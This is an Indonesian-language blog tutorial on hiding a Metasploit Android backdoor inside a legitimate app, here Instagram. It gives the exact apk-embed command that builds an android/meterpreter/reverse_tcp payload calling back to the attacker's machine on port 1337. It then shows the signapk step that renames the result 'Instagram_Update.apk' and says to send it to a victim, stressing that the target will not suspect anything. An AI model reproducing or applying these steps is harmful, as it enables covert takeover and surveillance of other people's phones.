Cara Menyisipkan Backdoor ke Aplikasi, Metasploit on Kali Linux

Apakabar sob sudah lama kita tidak betemu,  seperti biasa di sini saya akan sedikit menjelaskan tentang

Cara Menyisipkan Backdoor Android ke Apk di Kali Linux

Dalam melakukan Meremote Android orang lain menggunakan Metasploit, hal yang terpenting dan bisa dibilang penentunya ialah bagai mana cara mengirimkan backdoor nya ke victim, dalam kesempatan ini saya akan merekayasa bahwa seolah-olah backdoor tersebut ialah sebuah aplikasi pada umumnya yang bertujuan agar target atau victim tidak mencurigai.

Pola Kerja APK Embed

• Pertama tama Tools ini akan membuat payload atau sering dikenal dengan backdoor
• kemudian Tools ini akan menyisipkan payload yang telah dibuat dan menyisipkan ke apk yang akan disisipi payload.
• kemudian Pengguna akan mengirim payload yang berupa apk itu ke Target atau Victim.
• Setelah Target memasang dan menjalankan Payload yang berupa apk tersebut, Pengguna akan mendapatkan hak penuh dalam melakukan pembajakan terhadap perangkat yang digunakan oleh target yaitu Android.

Sebelum mempraktekan artikel di bawah ini sobat harus terlebih dahulu memiliki materialnya( bahannya ) yaitu apk-embed untuk mendapatkannya klik Download Jika sobat belum mempunyai Tools APK-Embed.

Setelah sobat mendapatkan apk-embednya langkah selanjutnya adalah mengekstrak toosl APK-Embed tersebut ke Desktop saja, agar mudah dalam melakukan pembelajarannya ya sob.
Setelah sobat mengekstrak tools apk-embednya, buka folder apk-embednya yang telah di ekstrak tadi dan pindahkan folder SignApk yang berada di folder apk-embed yang telah di ekstrak tadi ke Desktop ya sob.

Ok Simak Langsung Artikel di bawah ini ya sob: )

1. Sebelum mempraktekkan tutorial ini sobat harus menyiapkan terlebih dahulu apk apa yang akan sobat sisipkan backdoornya ke folder apk-embed, contohnya disini saya akan menyisipkan backdoornya kedalam aplikasi Instagram ya sob.

2. Lalu buka folder Apk-embednya dengan mengetikkan #cd Desktop/apk-embed

3. Setelah itu kita check apakah ada file-file apk-embednya dan apk yang akan di sisipkan backdoornya dengan mengetikkan #ls   

4. Setelah itu untuk mengeksekusi apk Instagramnya, dengan mengetikkan

#ruby apk-embed-payload.rb Instagram.apk -p android/meterpreter/reverse_tcp lhost=(ip pc sobat ) lport=1337 
Lalu klick tombol Enter

5. Setelah selesai dalam pengeksekusian apk nya akan muncul tampilan seperti berikut.

dibagian signing Instagram_backdoored.apk itu adalah hasil dalam pengeksekusiannya.

6. belum selesai sob ada 1 langkah lagi, selanjunya pindahkan apk hasil dari pengeksekusian tadi ke folder SignApk ya sob.

Setelah selesai memindahkan hasil pengeksekusiannya kita buka folder SignApk nya di terminal dengan mengetikkan #cd Desktop/SignApk

-Seperti yang saya katakan ada satu langkah dalam menyisipkan backdoor ini, langkah selanjutnya ketikkan di terminal #java -jar signapk.jar testkey.x509.pem testkey.pk8 Instagram_backdoored.apk Instagram_Update.apk

hasil dari eksekusi diatas ialah file yang bernama Instagram_Update.apk, tinggal sobat kirim ke victim ( Targer ). Tampilannya seperti Instagram umumnya namun victim tidak akan menyadari bahwa ada backdoor di dalam apk tersebut, jika backdoor tersebut di install di android target tampilannya seperti berikut:

 

Pada tampilan diatas kita bisa memastikan bahwa Victim ( Target ) tidak akan mencurigai sedikit pun bahwa terdapat backdoor di apk tersebut.

Hanya segitu yang bisa saya sampaikan, jika sobat mengalami kesulitan dalam melakukan konfigurasi di atas sobat bisa langsung menanyakan ke Admin Web ini, untuk menanyakannya sobat bisa masuk ke laman Contact yang berada di bagian menu paling atas, semoga bermanfaat ya sob : )